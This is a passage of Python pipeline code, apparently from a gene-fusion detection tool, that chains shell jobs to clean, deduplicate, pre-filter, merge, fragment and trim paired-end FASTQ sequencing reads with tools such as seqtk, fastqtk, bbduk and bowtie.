bottom = "\n\n\n", temp_path = temp_flag) else: job.link(f,output_1_file,temp_path=temp_flag) job.link(r,output_2_file,temp_path=temp_flag) in1 = output_1_file in2 = output_2_file ou3 = outdir(os.path.basename(in1).replace('init-','init-clear-')) ou4 = outdir(os.path.basename(in2).replace('init-','init-clear-')) # remove the reads marked as bad by Illumina job.add(_FC_+'remove-bad-illumina.py',kind='program') job.add('--input',in1,kind='input',temp_path=temp_flag) job.add('--output',ou3,kind='output') job.add('--link','hard',kind='parameter',checksum='no') job.add('2>',outdir('log_bad_illumina_1_%d.txt' % (i,)),kind='parameter',checksum='no') job.run() info(job, fromfile = outdir('log_bad_illumina_1_%d.txt' % (i,)), tofile = info_file, top = ["Reads (mate 1 from pair) removed because being marked as bad by Illumina:", "-------------------------------------------------------------------------"], bottom = "\n\n\n", temp_path=temp_flag) # job.add('printf',kind='program') # job.add(('"\nReads (mate 1 reads) removed because being marked as bad by Illumina:\n'+ # '---------------------------------------------------------------------\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_bad_illumina_1.txt'),kind='input',temp_path=temp_flag) # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() job.add(_FC_+'remove-bad-illumina.py',kind='program') job.add('--input',in2,kind='input',temp_path=temp_flag) job.add('--output',ou4,kind='output') job.add('--link','hard',kind='parameter',checksum='no') job.add('2>',outdir('log_bad_illumina_2_%d.txt' % (i,)),kind='parameter',checksum='no') job.run() info(job, fromfile = outdir('log_bad_illumina_2_%d.txt' % (i,)), tofile = info_file, top = ["Reads (mate 2 from pair) removed because being marked as bad by Illumina:", "-------------------------------------------------------------------------"], bottom = "\n\n\n", temp_path=temp_flag) # job.add('printf',kind='program') # job.add(('"Reads (read 2 from pair) removed because being marked as bad by Illumina:\n'+ # '----------------------------------------------------------------------------\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_bad_illumina_2.txt'),kind='input',temp_path=temp_flag) # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # add /1 and /2 in the end of the reads ids in1 = ou3 in2 = ou4 ou3 = outdir(os.path.basename(in1).replace('init-','init-sra-')) ou4 = outdir(os.path.basename(in2).replace('init-','init-sra-')) job.add(_FC_+'sra2illumina.py',kind='program') #job.add('--tag_read_name','Z'+str(i)+'Z',kind='parameter') job.add('--input_1',in1,kind='input',temp_path=temp_flag) job.add('--input_2',in2,kind='input',temp_path=temp_flag) job.add('--output_1',ou3,kind='output') job.add('--output_2',ou4,kind='output') job.add('--link','hard',kind='parameter') job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') job.run() in1 = ou3 in2 = ou4 output_file = outdir(os.path.basename(in1).replace('init-','init-shuffle-').replace("_1.",".").replace("_2.",".")) # job.add('shuffle.py',kind='program') # job.add('--input_1',in1,kind='input',temp_path=temp_flag) # 
job.add('--input_2',in2,kind='input',temp_path=temp_flag) # job.add('--output',output_file,kind='output') # job.run() # job.add('awk',kind='program') # job.add("""'{print; getline; print; getline; print; getline; print; getline < "%s"; print; getline < "%s"; print; getline < "%s"; print; getline < "%s"; print}' '%s'""" % (in2,in2,in2,in2,in1),kind='parameter') # job.add('',in1,kind='input',temp_path=temp_flag,command_line='no') # job.add('',in2,kind='input',temp_path=temp_flag,command_line='no') # job.add('>',output_file,kind='output') # job.run() #awk '{print; getline; print; getline; print; getline; print; getline < "2.txt"; print; getline < "2.txt"; print; getline < "2.txt"; print; getline < "2.txt"; print}' 1.txt if options.skip_fastqtk: job.add(_SK_+'seqtk',kind='program') job.add('mergepe',kind='parameter') job.add('',in1,kind='input',temp_path=temp_flag) job.add('',in2,kind='input',temp_path=temp_flag) job.add('>',output_file,kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('interleave',kind='parameter') job.add('',in1,kind='input',temp_path=temp_flag) job.add('',in2,kind='input',temp_path=temp_flag) job.add('',output_file,kind='output') job.run() shuffled = True new_list_input_files.append(output_file) job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() # last file in case that the number of input files is odd if len(list_input_files) % 2 == 1: f = list_input_files[-1] output_file = outdir(os.path.basename(f).replace('init-','init-single-')) job.link(f,output_file,temp_path=temp_flag) new_list_input_files.append(output_file) job.add('printf',kind='program') job.add('"\nTotal Count of reads (from all FASTQ files given as input and before any read removal is done, i.e. quality filtering, pre-processing):\n--------------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() list_input_files = new_list_input_files[:] new_list_input_files = [] for i,input_file in enumerate(list_input_files): job.add('printf',kind='program') job.add('"%s = "' % (input_file,),kind='parameter') job.add('>>',info_file,kind='output') job.run() if options.skip_fastqtk: job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',input_file,kind='input') job.add('|',kind='parameter') job.add("echo $((`wc -l`/4))",kind='parameter') job.add('>>',info_file,kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('count',kind='parameter') job.add('',input_file,kind='input') job.add('-',kind='parameter') job.add('>>',info_file,kind='output') job.run() # convert the read names to Illumina Solexa version 1.5 format (i.e. 
end in /1 or /2) output_file = outdir(os.path.basename(input_file).replace('init-','init-head-')) job.add(_FC_+'solexa18to15.py',kind='program') job.add('--fail',kind='parameter') job.add('--input',input_file,kind='input',temp_path=temp_flag) job.add('--output',output_file,kind='output') job.add('--link','hard',kind='parameter') job.run() # convert the quality scores to Illumina Solexa version 1.5 format infile = output_file output_file = outdir(os.path.basename(infile).replace('init-','init-phred-')) job.add(_FC_+'phred.py',kind='program') job.add('--link','hard',kind='parameter') job.add('--input',infile,kind='input',temp_path=temp_flag) job.add('--output',output_file,kind='output') job.add('--input_type','auto-detect',kind='parameter') #job.add('--output_type','illumina-1.5',kind='parameter') job.add('--output_type','sanger',kind='parameter') job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') job.run() new_list_input_files.append(output_file) job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() output_file = outdir('orig__.fq') # concatenate reads before trimming if len(list_input_files) > 1: #job.add('concatenate.py',kind='program') job.add('cat',kind='program') job.add_list('',new_list_input_files,kind='input',temp_path=temp_flag) if options.trimfq < 1: job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-q',options.trimfq,kind='parameter') job.add('-',kind='parameter') job.add('>',output_file,kind='output') job.run() else: job.link(new_list_input_files[0], output_file, temp_path=temp_flag) if not options.skip_trim_multiple_5: #bbduk.sh in=reads.fq out=clean.fq ftm=5 job.add(_BP_+'bbduk.sh',kind='program') job.add('forcetrimmod=','5',kind='parameter',space='no') job.add('in=',outdir('orig__.fq'),kind='input',space='no', temp_path=temp_flag) job.add('out=',outdir('orig__x.fq'),kind='output',space='no') job.run() else: job.link(outdir('orig__.fq'), outdir('orig__x.fq'), temp_path=temp_flag) if not options.skip_filter_low_entropy: #bbduk.sh in=r.fq out=o.fq entropy=0.1 entropymask=t entropyk=2 entropywindow=40 job.add(_BP_+'bbduk.sh',kind='program') job.add('entropy=','0.1',kind='parameter',space='no') job.add('entropymask=','t',kind='parameter',space='no') job.add('entropyk=','2',kind='parameter',space='no') job.add('entropywindow=','40',kind='parameter',space='no') job.add('in=',outdir('orig__x.fq'),kind='input',space='no', temp_path=temp_flag) job.add('out=',outdir('orig.fq'),kind='output',space='no') job.run() else: job.link(outdir('orig__x.fq'), outdir('orig.fq'), temp_path=temp_flag) if not options.skip_deduplication: job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('orig.fq'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('paste','- - - - - - - -',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add(_FC_+'pair8removal.py',kind='parameter') job.add('-l','30',kind='parameter') job.add('-i','-',kind='parameter') job.add('-o','-',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') if parsort: job.add(_PL_+'parsort',kind='parameter') job.add('-k','2,2',kind='parameter') job.add('-k','6,6',kind='parameter') job.add('-u',kind='parameter') # unique job.add('-t',"'\\\t'",kind='parameter') job.add('--parallel',options.processes,kind='parameter',checksum='no') if parsort_buffer_size: 
job.add('--buffer-size',parsort_buffer_size,kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') else: job.add('sort',kind='parameter') job.add('-k','2,2',kind='parameter') job.add('-k','6,6',kind='parameter') job.add('-u',kind='parameter') # unique job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('"\\t"',kind='parameter') job.add('"\\n"',kind='parameter') job.add('>',outdir('origi.fq'),kind='output') job.run() else: job.link(outdir('orig.fq'), outdir('origi.fq'), temp_path=temp_flag) if options.prefilter == "3": # job.add(_SK_+'seqtk',kind='program') # job.add('seq',kind='parameter') # job.add('-1',outdir('origi.fq'),kind='input') # job.add('>',outdir('ox1.fq'),kind='output') # job.run() # # job.add(_SK_+'seqtk',kind='program') # job.add('seq',kind='parameter') # job.add('-2',outdir('origi.fq'),kind='input',temp_path=temp_flag) # job.add('>',outdir('ox2.fq'),kind='output') # job.run() if options.skip_fastqtk: job.add(_FC_+'unshuffle.py',kind='program') job.add('-i',outdir('origi.fq'),kind='input',temp_path=temp_flag) job.add('-f',outdir('ox1.fq'),kind='output') job.add('-r',outdir('ox2.fq'),kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('deinterleave',kind='parameter') job.add('',outdir('origi.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('ox1.fq'),kind='output') job.add('',outdir('ox2.fq'),kind='output') job.run() use_seed = True if use_seed: # map reads on transcriptome for fast filtering job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('--seedmms','1',kind='parameter') # options.mismatches job.add('--seedlen',options.trim_3end_keep,kind='parameter') job.add('--trim5','7',kind='parameter') # trim the 10 job.add('-X','100000',kind='parameter') # The maximum insert size for valid paired-end alignments. 
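# note: '--trim5 7' removes the first 7 bases before alignment and the seed
# spans options.trim_3end_keep bases, so the mapped/unmapped decision rests
# on an internal window of each read rather than its very 5' end.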
job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-k','1',kind='parameter') job.add('--phred33-quals',kind='parameter') # job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') # job.add('--best',kind='parameter') #job.add('--strata',kind='parameter') job.add('--un',outdir('ox.fq'),kind='output',checksum='no') # unmapped reads job.add('--un',outdir('ox_1.fq'),kind='output',command_line='no') # unmapped reads job.add('--un',outdir('ox_2.fq'),kind='output',command_line='no') # unmapped reads job.add('--max',outdir('oxx_multiple.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('-1',outdir('ox1.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('ox2.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('ox.map'),kind='output',temp_path=temp_flag) job.add('2>',outdir('log_fast-filtering.stdout.txt'),kind='output',checksum='no') job.run() else: # this was the original one # map reads on transcriptome for fast filtering job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-v','1',kind='parameter') # options.mismatches # job.add('-X','800',kind='parameter') job.add('-X','10000',kind='parameter') # The maximum insert size for valid paired-end alignments. job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-k','1',kind='parameter') job.add('--phred33-quals',kind='parameter') # job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') # job.add('--best',kind='parameter') #job.add('--strata',kind='parameter') job.add('--un',outdir('ox.fq'),kind='output',checksum='no') # unmapped reads job.add('--un',outdir('ox_1.fq'),kind='output',command_line='no') # unmapped reads job.add('--un',outdir('ox_2.fq'),kind='output',command_line='no') # unmapped reads job.add('--max',outdir('ox_multiple.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('-1',outdir('ox1.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('ox2.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('ox.map'),kind='output',temp_path=temp_flag) job.add('2>',outdir('log_fast-filtering.stdout.txt'),kind='output',checksum='no') job.run() # save lengths reads info(job, fromfile = outdir('log_fast-filtering.stdout.txt'), tofile = info_file, top = ["Fast pre-filtering:", "-------------------"], bottom = "\n\n\n", temp_path=temp_flag) if options.skip_fastqtk: job.add(_SK_+'seqtk',kind='program') job.add('mergepe',kind='parameter') job.add('',outdir('ox_1.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('ox_2.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('origin.fq'),kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('interleave',kind='parameter') job.add('',outdir('ox_1.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('ox_2.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('origin.fq'),kind='output') job.run() else: job.link(outdir('origi.fq'), outdir('origin.fq'), temp_path=temp_flag) if options.skip_fastqtk: # compute the read lengths 
for the input file job.add(_FC_+'lengths_reads.py',kind='program') job.add('--input',outdir('origin.fq'),kind='input') job.add('--output',outdir('log_lengths_original_reads.txt'),kind='output') job.add('--counts',outdir('log_counts_original_reads.txt'),kind='output') job.run() ##cat snu16/reads_acgt.fq | awk '{if(NR%4==2) print length($1)}' | sort -n | uniq else: job.add(_FK_+'fastqtk',kind='program') job.add('count-lengths',kind='parameter') job.add('',outdir('origin.fq'),kind='input') job.add('',outdir('log_counts_original_reads.txt'),kind='output') job.add('',outdir('log_lengths_original_reads.txt'),kind='output') job.run() max_len_reads = 0 if os.path.exists(outdir('log_lengths_original_reads.txt')): max_len_reads = int(float(file(outdir('log_lengths_original_reads.txt'),'r').readline().rstrip())) if not options.bridges: options.bridges = int(math.ceil(float(max_len_reads)/float(160))) # save lengths reads info(job, fromfile = outdir('log_lengths_original_reads.txt'), tofile = info_file, top = ["Length of all original reads:", "-----------------------------"], bottom = "\n\n\n") # job.add('printf',kind='program') # job.add('"\nLength of Original Reads:\n-----------------\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_lengths_original_reads.txt'),kind='input',temp_path=temp_flag) # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() if shuffled and (not options.skip_compress_ids): if options.skip_fastqtk: # lossy compression of the reads ids job.add(_FC_+'compress-reads-ids.py',kind='program') job.add('--input',outdir('origin.fq'),kind='input',temp_path=temp_flag) job.add('--output',outdir('original.fq'),kind='output') job.add('--count-reads',outdir('log_counts_original_reads.txt'),kind='input') job.add('--lowercase',kind='parameter') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('compress-id',kind='parameter') job.add('/12',kind='parameter') job.add('',outdir('log_counts_original_reads.txt'),kind='input') job.add('',outdir('origin.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('original.fq'),kind='output') job.run() else: job.link(outdir('origin.fq'), outdir('original.fq'), temp_path=temp_flag) info(job, fromfile = outdir('log_counts_original_reads.txt'), tofile = info_file, top = ["------------------------------------------------------------------------------------------------------", "Total counts of all input/original reads (reads marked by Illumina as bad are not included here):", "------------------------------------------------------------------------------------------------------"], bottom = "\n------------------------------------------------------------------------------------------------------\n\n", temp_path = temp_flag) # job.add('printf',kind='program') # job.add(('"\nTotal Reads Counts (after the reads marked by Illumina as bad have been removed):\n'+ # '---------------------------------------------------------------------------------\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_counts_original_reads.txt'),kind='input',temp_path=temp_flag) # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() if options.sonication > 80 and 
options.trim_psl_3end_keep < options.sonication and options.sonication <= max_len_reads: job.add('printf',kind='program') job.add('"\n\nInput reads are broken up bioinformatically into smaller pieces due to detection of very long reads!\n----------------------\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() # job.add(_SK_+'seqtk',kind='program') # job.add('trimfq',kind='parameter') # job.add('-q','0.25',kind='parameter') # job.add('',outdir('original.fq'),kind='input',temp_path=temp_flag) # job.add('>',outdir('original-temp.fq'),kind='output') # job.run() # job.add(_SK_+'seqtk',kind='program') # job.add('seq',kind='parameter') # job.add('-1',outdir('original.fq'),kind='input') # job.add('>',outdir('or1.fq'),kind='output') # job.run() # # job.add(_SK_+'seqtk',kind='program') # job.add('seq',kind='parameter') # job.add('-2',outdir('original.fq'),kind='input',temp_path=temp_flag) # job.add('>',outdir('or2.fq'),kind='output') # job.run() # job.add(_FC_+'overlap.py',kind='program') # job.add('--input_1',outdir('or1.fq'),kind='input') # job.add('--input_2',outdir('or2.fq'),kind='input') # job.add('--processes',options.processes,kind='parameter',checksum='no') # job.add('--merged',kind='parameter') # job.add('--alignment',outdir('merged.txt'),kind='output') # job.add('--output',outdir('log_overlaps_fragments.txt'),kind='output') # job.run() if options.skip_bbmerge: job.add(_FC_+'merge-reads.py',kind='program') job.add('-1',outdir('original.fq'),kind='input',temp_path=temp_flag) job.add('-m',outdir('merged.fq'),kind='output') job.add('-f',outdir('or1.fq'),kind='output') job.add('-r',outdir('or2.fq'),kind='output') job.add('--overlap','13',kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.run() else: #bbmerge.sh in=reads.fq out=merged.fq outu=unmerged.fq ihist=ihist.txt job.add(_BP_+'bbmerge.sh',kind='program') job.add('in=',outdir('original.fq'),kind='input',space='no') job.add('out=',outdir('merged.fq'),kind='output',space='no') job.add('outu=',outdir('unmerged.fq'),kind='output',space='no') job.add('threads=',options.processes,kind='parameter',space='no',checksum='no') job.add('strict=','f',kind='parameter',space='no') job.add('minoverlap=','13',kind='parameter',space='no') job.add('-Xmx',options.xmx,kind='parameter',checksum='no',space='no') job.run() if options.skip_fastqtk: job.add(_FC_+'unshuffle.py',kind='program') job.add('-i',outdir('unmerged.fq'),kind='input',temp_path=temp_flag) job.add('-f',outdir('or1.fq'),kind='output') job.add('-r',outdir('or2.fq'),kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('deinterleave',kind='parameter') job.add('',outdir('unmerged.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('or1.fq'),kind='output') job.add('',outdir('or2.fq'),kind='output') job.run() job.add(_FC_+'fragment_fastq.py',kind='program') job.add('-1',outdir('or1.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('or2.fq'),kind='input',temp_path=temp_flag) job.add('-f',outdir('originala-t1.fq'),kind='output') # job.add('-m',outdir('merged.txt'),kind='input',temp_path=temp_flag) job.add('--window-size',options.trim_psl_3end_keep,kind='parameter') job.add('--step-size',options.trim_psl_3end_keep-2*length_anchor_minimum+1,kind='parameter') job.add('--threshold-read',options.trim_psl_3end_keep + 10,kind='parameter') job.add('--anchors',options.bridges,kind='parameter') job.add('--skip-short',options.trim_3end_keep,kind='parameter') job.add('--trim-n',kind='parameter') job.run()
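# The sliding-window fragmentation below is also applied to the merged
# (now single-end) reads. Sketch of the windowing arithmetic: with window
# size W = options.trim_psl_3end_keep and step S = W - 2*length_anchor_minimum + 1,
# consecutive windows overlap by 2*length_anchor_minimum - 1 bases, which
# guarantees that any junction in the interior of a long read is covered by
# at least length_anchor_minimum bases on both sides in some fragment (edge
# handling is left to fragment_fastq.py itself).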
job.add(_FC_+'fragment_fastq.py',kind='program') job.add('-1',outdir('merged.fq'),kind='input',temp_path=temp_flag) job.add('-2','-',kind='parameter') job.add('-f',outdir('originala-t2.fq'),kind='output') job.add('--window-size',options.trim_psl_3end_keep,kind='parameter') job.add('--step-size',options.trim_psl_3end_keep-2*length_anchor_minimum+1,kind='parameter') job.add('--threshold-read',options.trim_psl_3end_keep + 10,kind='parameter') job.add('--anchors',options.bridges,kind='parameter') job.add('--skip-short',options.trim_3end_keep,kind='parameter') job.add('--trim-n',kind='parameter') job.run() job.add('cat',kind='program') job.add('',outdir('originala-t1.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('originala-t2.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('originala.fq'),kind='output') job.run() fragments_flag = True # job.add('cat',kind='program') # job.add('',outdir('or1.fq'),kind='input',temp_path=temp_flag) # job.add('',outdir('or2.fq'),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # if pigz: # job.add('pigz',kind='parameter') # job.add('-p',options.processes,kind='parameter',checksum='no') # else: # job.add('gzip',kind='parameter') # job.add('--fast',kind='parameter') # job.add('>',outdir('or.fq.gz'),kind='output') # job.run() # job.add('seqtk',kind='program') # job.add('mergepe',kind='parameter') # job.add('',outdir('soni1.fq'),kind='input',temp_path=temp_flag) # job.add('',outdir('soni2.fq'),kind='input',temp_path=temp_flag) # job.add('>',outdir('originala.fq'),kind='output') # job.run() if options.skip_fastqtk: # compute the read lengths for the input file job.add(_FC_+'lengths_reads.py',kind='program') job.add('--input',outdir('originala.fq'),kind='input') job.add('--output',outdir('log_lengths_original_reads_final.txt'),kind='output') job.add('--counts',outdir('log_counts_original_reads_final.txt'),kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('count-lengths',kind='parameter') job.add('',outdir('originala.fq'),kind='input') job.add('',outdir('log_counts_original_reads_final.txt'),kind='output') job.add('',outdir('log_lengths_original_reads_final.txt'),kind='output') job.run() max_len_reads = 0 if os.path.exists(outdir('log_lengths_original_reads_final.txt')): max_len_reads = int(float(file(outdir('log_lengths_original_reads_final.txt'),'r').readline().rstrip())) info(job, fromfile = outdir('log_counts_original_reads_final.txt'), tofile = info_file, top = ["Total counts of all input reads (after breaking them up bioinformatically):", "-------------------------------------------------------------------------------------------------"], bottom = "\n\n\n", temp_path = temp_flag) # save lengths reads info(job, fromfile = outdir('log_lengths_original_reads_final.txt'), tofile = info_file, top = ["Length of all input reads (after breaking them up bioinformatically):", "---------------------------------------------------------------------"], bottom = "\n\n\n") else: job.link(outdir('original.fq'), outdir('originala.fq'), temp_path=temp_flag) input_file = outdir('originala.fq') output_file = outdir('original-t5-t3.fq') if options.trim_5end > 0 or options.trim_3end > 0: # trim 5 # job.add('trim_reads.py',kind='program') # job.add('--input',input_file,kind='input', temp_path='no') # job.add('--output',output_file,kind='output') # job.add('--trim_end','5',kind='parameter') # job.add('--trim_size',options.trim_5end,kind='parameter') # job.run() job.add(_SK_+'seqtk',kind='program')
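# note: seqtk 'trimfq -b/-e' clips a fixed number of bases from the 5'/3'
# ends; '-l 1' is assumed here to relax trimfq's default minimum-length
# setting so that heavily trimmed reads are not dropped yet, leaving the
# explicit short-read filter applied later to make that call.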
job.add('trimfq',kind='parameter') job.add('-l','1',kind='parameter') if options.trim_5end > 0: job.add('-b',options.trim_5end,kind='parameter') if options.trim_3end > 0: job.add('-e',options.trim_3end,kind='parameter') job.add('',input_file,kind='input', temp_path='no') job.add('>',output_file,kind='output') job.run() else: job.link(input_file, output_file, temp_path='no') #input_file = output_file #output_file = input_file[:input_file.rfind('.fq')]+'-t3.fq' #if options.trim_3end > 0: # # trim 3 ## job.add('trim_reads.py',kind='program') ## job.add('--input',input_file,kind='input', temp_path=temp_flag) ## job.add('--output',output_file,kind='output') ## job.add('--trim_end','3',kind='parameter') ## job.add('--trim_size',options.trim_3end,kind='parameter') ## job.run() # job.add('seqtk',kind='program') # job.add('trimfq',kind='parameter') # job.add('-e',options.trim_5end,kind='parameter') # job.add('',input_file,kind='input', temp_path=temp_flag) # job.add('>',output_file,kind='output') # job.run() #else: # job.link(input_file, output_file, temp_path=temp_flag) input_file = output_file output_file = outdir('reads.fq') if options.trim_3end_keep > 0: # trim from 3-end to have the reads all the same length job.add(_FC_+'trim_reads.py',kind='program') job.add('--input',input_file,kind='input', temp_path=temp_flag) job.add('--output',output_file,kind='output') job.add('--trim_end','3',kind='parameter') job.add('--trim_n',kind='parameter') job.add('--final_size',options.trim_3end_keep,kind='parameter') job.run() # job.add('seqtk',kind='program') # job.add('trimfq',kind='parameter') # #job.add('-q','0',kind='parameter') # job.add('-l','1',kind='parameter') # job.add('-B',options.trim_3end_keep,kind='parameter') # job.add('',input_file,kind='input', temp_path=temp_flag) # job.add('>',output_file,kind='output') # job.run() else: job.link(input_file, output_file, temp_path=temp_flag) if options.skip_fastqtk: # compute the read lengths for the input file job.add(_FC_+'lengths_reads.py',kind='program') job.add('--input',outdir('reads.fq'),kind='input') job.add('--output',outdir('log_lengths_reads.txt'),kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('lengths',kind='parameter') job.add('',outdir('reads.fq'),kind='input') job.add('',outdir('log_lengths_reads.txt'),kind='output') job.run() #job.add(kind='program') len_reads = 0 if os.path.exists(outdir('log_lengths_reads.txt')): len_reads = int(float(file(outdir('log_lengths_reads.txt'),'r').readline().rstrip('\r\n'))) # reads shorter than this will be skipped from analysis, 34? 
minimum_length_short_read = len_reads if job.run(): file(outdir('log_minimum_length_short_read.txt'),'w').write(str(minimum_length_short_read)) min_len_reads = 0 if os.path.exists(outdir('log_minimum_length_short_read.txt')): min_len_reads = int(float(file(outdir('log_minimum_length_short_read.txt'),'r').readline().rstrip())) # save lengths reads info(job, fromfile = outdir('log_lengths_reads.txt'), tofile = info_file, top = ["Lengths of all reads after trimming:", "------------------------------------"], bottom = "\n\n\n") # job.add('printf',kind='program') # job.add('"\nLength Reads (after trimming):\n--------------------------\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_lengths_reads.txt'),kind='input') # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() ############################################################################## # FILTERING - ambiguous + Bs + too short ############################################################################## if options.skip_b_filtering: #job.link(outdir('reads.fq'), outdir('reads_no-shorts.fq'), temp_path=temp_flag) job.add(_SK_+'seqtk',kind='program') job.add('seq',kind='parameter') job.add('-L',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') job.add('',outdir('reads.fq'),kind='input',temp_path=temp_flag) #job.add('>',outdir('reads_no-shorts.fq'),kind='output') if (not options.all_reads_junction) and (not options.skip_interleave_processing): job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('dropse',kind='parameter') job.add('-',kind='parameter') job.add('>',outdir('reads_acgt.fq'),kind='output') job.run() else: job.add(_SK_+'seqtk',kind='program') job.add('seq',kind='parameter') job.add('-L',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file='yes') job.add('',outdir('reads.fq'),kind='input',temp_path=temp_flag) #job.add('>',outdir('reads_no-shorts.fq'),kind='output') if (not options.all_reads_junction) and (not options.skip_interleave_processing): job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('dropse',kind='parameter') job.add('-',kind='parameter') job.add('|',kind='parameter') # fix Illumina "B" job.add(_FC_+'fastq_b2n.py',kind='parameter') #job.add('--input',input_file,kind='input',temp_path=temp_flag) job.add('--input','-',kind='parameter') job.add('--replacement','A',kind='parameter') job.add('--sanger',kind='parameter') job.add('--ambiguous',kind='parameter') job.add('--threshold',outdir('log_minimum_length_short_read.txt'),kind='parameter',from_file = 'yes') #job.add('--output',output_file,kind='output') #job.add('--output',outdir('reads_b2n2a.fq'),kind='output') job.add('--output','-',kind='output') #job.run() # filter out the reads with poly tail # trim the poly tails #job.add('trim_poly_tails.py',kind='program') job.add('|',kind='parameter') job.add(_FC_+'trim_poly_tails.py',kind='parameter') #job.add('--input',outdir('reads_b2n2a.fq'),kind='input',temp_path=temp_flag) job.add('--input','-',kind='parameter') job.add('--repeats',length_anchor_minimum - 1,kind='parameter') # 12 #job.add('--skip_reads',kind='parameter') job.add('--output','-',kind='parameter') job.add('2>>',outdir('info.txt'),kind='output') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('seq',kind='parameter') 
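# note: the '-L' threshold added next is read from
# log_minimum_length_short_read.txt at command-build time (from_file='yes'),
# so the short-read cutoff tracks the length recorded for this run instead
# of a hard-coded value.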
